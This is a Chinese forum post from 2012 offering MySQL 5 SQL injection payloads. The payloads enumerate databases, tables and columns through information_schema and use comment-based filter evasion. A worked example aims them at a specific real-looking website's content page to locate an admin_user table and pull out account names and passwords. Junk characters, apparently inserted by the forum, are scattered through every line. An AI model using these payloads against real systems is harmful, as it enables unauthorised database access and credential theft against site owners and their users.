查库5 ?' A4 w2 S+ @" ~; L
9 z7 N2 q! N! d0 g
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
! Q9 L" g9 [) R. y2 w; Y: n# H% j% w+ M4 m3 X9 s* k' \
查表
- W) i t8 G2 [+ J. c h7 [/ l8 O, m! h0 Y
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1 ^* x/ V6 Q4 b/ G& e* ^' X- f
/ [" e" S3 u2 o$ s查段
& p; g0 X2 k& i) r \/ w1 K) l7 T% {( t+ L9 g
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
, e M: R X; }$ O8 Z% }$ T/ K# l" Z9 J& A* r
7 w. Y6 L; [- [mysql5高级注入方法暴表& O3 u: O# ?+ `" W' ?3 h# m
9 G, g5 m/ H6 o. P/ ?, B) }例子如下:
6 o: L/ L/ r$ P
1 _7 O6 ]0 P, o' C5 Z/ Z; A( W3 a1.爆表& E& ~, R. _1 F: ^
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)8 `# Y D, c" {" V/ [
这样爆到第4个时出现了admin_user表。
+ `, R5 H# n' G/ }- {" X
: s+ l2 ]% D7 Y# X* t2.暴字段
$ L) y2 [* f: h' o s8 C- `http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*! v$ T. m, p/ L3 R
& q% I# h: u$ E$ u, G/ G6 C& A& n
/ X7 `7 D4 x2 E. C0 n; Z, F0 `3.爆密码. {5 e8 R- P; b/ A$ t% V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ' v& Q- ]4 E" y+ f7 u) a& a% E
% y K: f) s! I+ x5 [
, |: E$ I) E0 f, ?" k8 a; I
|
发表于 2012-9-13 16:29:37
收藏
支持
反对